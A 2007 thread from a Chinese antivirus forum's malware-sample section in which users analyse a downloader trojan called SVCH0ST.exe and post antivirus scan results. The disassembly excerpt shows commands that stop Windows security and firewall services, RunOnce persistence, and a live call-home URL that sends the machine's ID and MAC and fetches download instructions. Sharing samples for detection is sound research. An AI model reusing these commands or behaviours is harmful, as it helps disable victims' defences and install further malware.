收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 一个比较恶毒的下载者3D0C92
12下一页
返回列表 发新帖
查看: 2701|回复: 15
收起左侧

[病毒样本] 一个比较恶毒的下载者3D0C92

[复制链接]
promised
发表于 2007-9-21 19:29:01 | 显示全部楼层 |阅读模式
开机自启动,不断变换进程pid,关闭系统防火墙,在下木马
好像还会修改ip
附代码
  1. 00407F6D PUSH SVCH0ST.00407FA4 ASCII "kernel32.dll"
  2. 00407F7D PUSH SVCH0ST.00407FB4 ASCII "GetDiskFreeSpaceExA"
  3. 00407FA4 ASCII "kernel32.dll",0
  4. 00407FB4 ASCII "GetDiskFreeSpace"
  5. 00407FC4 ASCII "ExA",0
  6. 00408541 ASCII " *@@* $@@($*)@-$"
  7. 00408551 ASCII "*@@$-*@@$*-@@(*$"
  8. 00408561 ASCII ")@-*"
  9. 00408566 ASCII "@@*-$@@*$-@@-* $"
  10. 00408576 ASCII "@-$ *@* $-@$ *-@"
  11. 00408586 ASCII "$ -*"
  12. 00408CEC MOV EDX,SVCH0ST.00408D2C ASCII "0x"
  13. 00408D2C ASCII "0x",0
  14. 00408D70 ASCII "http://count.hdp"
  15. 00408D80 ASCII "xzx.cn/inc/",0
  16. 00408E68 PUSH SVCH0ST.00408EC4 ASCII "SeRestorePrivilege"
  17. 00408EC4 ASCII "SeRestorePrivile"
  18. 00408ED4 ASCII "ge",0
  19. 00409009 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
  20. 0040901C MOV EDX,SVCH0ST.00409160 ASCII "HIV"
  21. 00409034 PUSH SVCH0ST.00409164 ASCII "SOFTWARE"
  22. 00409047 PUSH SVCH0ST.00409170 ASCII "Microsoft"
  23. 00409059 PUSH SVCH0ST.0040917C ASCII "Windows"
  24. 0040906B PUSH SVCH0ST.00409184 ASCII "CurrentVersion"
  25. 0040907D PUSH SVCH0ST.00409194 ASCII "RunOnce"
  26. 004090A9 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
  27. 004090E4 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
  28. 00409150 ASCII "\haojing.hiv",0
  29. 00409160 ASCII "HIV",0
  30. 00409164 ASCII "SOFTWARE",0
  31. 00409170 ASCII "Microsoft",0
  32. 0040917C ASCII "Windows",0
  33. 00409184 ASCII "CurrentVersion",0
  34. 00409194 ASCII "RunOnce",0
  35. 004091D6 MOV EAX,SVCH0ST.0040920C ASCII "No computer name"
  36. 0040920C ASCII "No computer "
  37. 0040921C ASCII "name",0
  38. 0040929D MOV EDX,SVCH0ST.00409488 ASCII "00-00-00-00-00-00"
  39. 004092D9 MOV EDX,SVCH0ST.004094A4 ASCII "\"
  40. 004092EB MOV EDX,SVCH0ST.004094A4 ASCII "\"
  41. 004092FF PUSH SVCH0ST.004094A8 ASCII "NETAPI32.DLL"
  42. 00409316 PUSH SVCH0ST.004094B8 ASCII "NetWkstaTransportEnum"
  43. 00409326 PUSH SVCH0ST.004094D0 ASCII "NetApiBufferFree"
  44. 0040939F MOV EAX,SVCH0ST.004094EC ASCII "TCPIP"
  45. 00409488 ASCII "00-00-00-00-00-0"
  46. 00409498 ASCII "0",0
  47. 004094A4 ASCII "\",0
  48. 004094A8 ASCII "NETAPI32.DLL",0
  49. 004094B8 ASCII "NetWkstaTranspor"
  50. 004094C8 ASCII "tEnum",0
  51. 004094D0 ASCII "NetApiBufferFree"
  52. 004094E0 ASCII 0
  53. 004094EC ASCII "TCPIP",0
  54. 0040950D PUSH SVCH0ST.00409578 ASCII "Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE"
  55. 0040955C MOV EDX,SVCH0ST.004095C8 ASCII "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
  56. 00409578 ASCII "Software\Microso"
  57. 00409588 ASCII "ft\Windows\Curre"
  58. 00409598 ASCII "ntVersion\App Pa"
  59. 004095A8 ASCII "ths\IEXPLORE.EXE"
  60. 004095B8 ASCII 0
  61. 004095C8 ASCII "C:\Program Files"
  62. 004095D8 ASCII "\Internet Explor"
  63. 004095E8 ASCII "er\IEXPLORE.EXE",0
  64. 0040962F MOV EDX,SVCH0ST.00409678 ASCII "cmd /c "
  65. 00409678 ASCII "cmd /c ",0
  66. 004096BE MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  67. 004096ED MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  68. 0040972F MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  69. 0040975E MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  70. 004097A4 ASCII "\SVCH0ST.exe",0
  71. 004097D7 PUSH SVCH0ST.00409BDC ASCII "net stop wscsvc"
  72. 004097E3 PUSH SVCH0ST.00409BEC ASCII "net stop sharedaccess"
  73. 00409894 PUSH SVCH0ST.00409C14 ASCII " http://count.hdpxzx.cn/count.jsp?id="
  74. 0040989F PUSH SVCH0ST.00409C44 ASCII "&mac="
  75. 004098AA PUSH SVCH0ST.00409C54 ASCII "&te="
  76. 004098B5 PUSH SVCH0ST.00409C64 ASCII "&fc=fc"
  77. 004098E5 PUSH SVCH0ST.00409C74 ASCII "fc"
  78. 004098FA PUSH SVCH0ST.00409C80 ASCII ".txt"
  79. 00409914 PUSH SVCH0ST.00409C74 ASCII "fc"
  80. 00409929 PUSH SVCH0ST.00409C80 ASCII ".txt"
  81. 00409A31 MOV EDX,SVCH0ST.00409C9C ASCII "[downfile]"
  82. 00409A49 MOV EDX,SVCH0ST.00409CB0 ASCII "[openurl]"
  83. 00409AEE PUSH SVCH0ST.00409CC4 ASCII "\KB"
  84. 00409AF9 PUSH SVCH0ST.00409CD0 ASCII ".log"
  85. 00409BDC ASCII "net stop wscsvc",0
  86. 00409BEC ASCII "net stop shareda"
  87. 00409BFC ASCII "ccess",0
  88. 00409C14 ASCII " http://count.hd"
  89. 00409C24 ASCII "pxzx.cn/count.js"
  90. 00409C34 ASCII "p?id=",0
  91. 00409C44 ASCII "&mac=",0
  92. 00409C54 ASCII "&te=",0
  93. 00409C64 ASCII "&fc=fc",0
  94. 00409C74 ASCII "fc",0
  95. 00409C80 ASCII ".txt",0
  96. 00409C90 ASCII "",0
  97. 00409C9C ASCII "[downfile]",0
  98. 00409CB0 ASCII "[openurl]",0
  99. 00409CC4 ASCII "\KB",0
  100. 00409CD0 ASCII ".log",0
  101. 00409CE0 ASCII " ",0
  102. 00409DDF PUSH 0FF (初始 CPU 选择)
  103. 00409E08 MOV ECX,SVCH0ST.00409E70 ASCII "\SVCH0ST.exe"
  104. 00409E70 ASCII "\SVCH0ST.exe",0
复制代码

[ 本帖最后由 promised 于 2007-9-21 19:31 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

FBAV
发表于 2007-9-21 19:29:53 | 显示全部楼层
MicroVita AntiSpyware 100 C
_____________________________________________
                                          
             风暴微塔反间谍
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]                  
                   http://221.10.254.214/
----------------------------------------------
开始扫描……

正在检查启动……
[C:\Documents and Settings\Administrator\桌面\virus\SVCH0ST\SVCH0ST.exe]
                    …………发现Spy!报告: [4]
文件信息:  大小:57344  MD5:3d0c92870bfaf1783f1a540a31aca4fe

文件数:1   病毒数:1  比重:1
OK  扫描完毕!
  ***日志解释
[4] 集中有害分析引擎
[3] 全局系统判断引擎   
[2] 文件特征码引擎
[1] 文件启发式引擎
回复

举报

风野胤
发表于 2007-9-21 19:32:19 | 显示全部楼层
Scanning Log
NOD32 version 2543 (20070921) NT
Command line: R:\SVCH0ST.rar
Checking CRC of NOD32.EXE: Status OK
Scanning memory: Not performed (option disabled)
Error occurred while scanning MBR sector of the 2.  ?
?physical disk. Error reading sector.
Date: 21.9.2007  Time: 19:31:31
Anti-Stealth technology is enabled.
Scanned disks, folders and files: R:\SVCH0ST.rar
R:\SVCH0ST.rar ?RAR ?SVCH0ST.exe - probably unknown  ?
?NewHeur_PE virus [7]
Number of scanned files: 1
Number of threats found: 1
Time of completion: 19:31:32 Total scanning time: 1 sec  ?
?(00:00:01)
Notes:
[7] File is probably infected with an unknown virus.



ps  发源代码不好吧
回复

举报

aziok
发表于 2007-9-21 19:33:03 | 显示全部楼层
Begin scan in  \桌面\SVCH0ST.rar
  [0] Archive type: RAR
  --> SVCH0ST.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
回复

举报

promised
 楼主| 发表于 2007-9-21 19:33:43 | 显示全部楼层

回复 3楼 风野胤 的帖子

这个不是源码
是反编汇
回复

举报

FBAV
发表于 2007-9-21 19:34:18 | 显示全部楼层
原帖由 风野胤 于 2007-9-21 19:32 发表
Scanning Log
NOD32 version 2543 (20070921) NT
Command line: R:\SVCH0ST.rar
Checking CRC of NOD32.EXE: Status OK
Scanning memory: Not performed (option disabled)
Error occurred while scanning MBR  ...

这是反汇编
会得任何人都可以的
脱壳 - 反汇编
回复

举报

xffsfy
发表于 2007-9-21 19:34:44 | 显示全部楼层
BD...

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

风野胤
发表于 2007-9-21 19:35:22 | 显示全部楼层
才学语言
汇编还没学
早呢
回复

举报

scottxzt
发表于 2007-9-21 19:37:42 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

solcroft
发表于 2007-9-21 19:42:06 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-18 08:33 , Processed in 0.158266 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表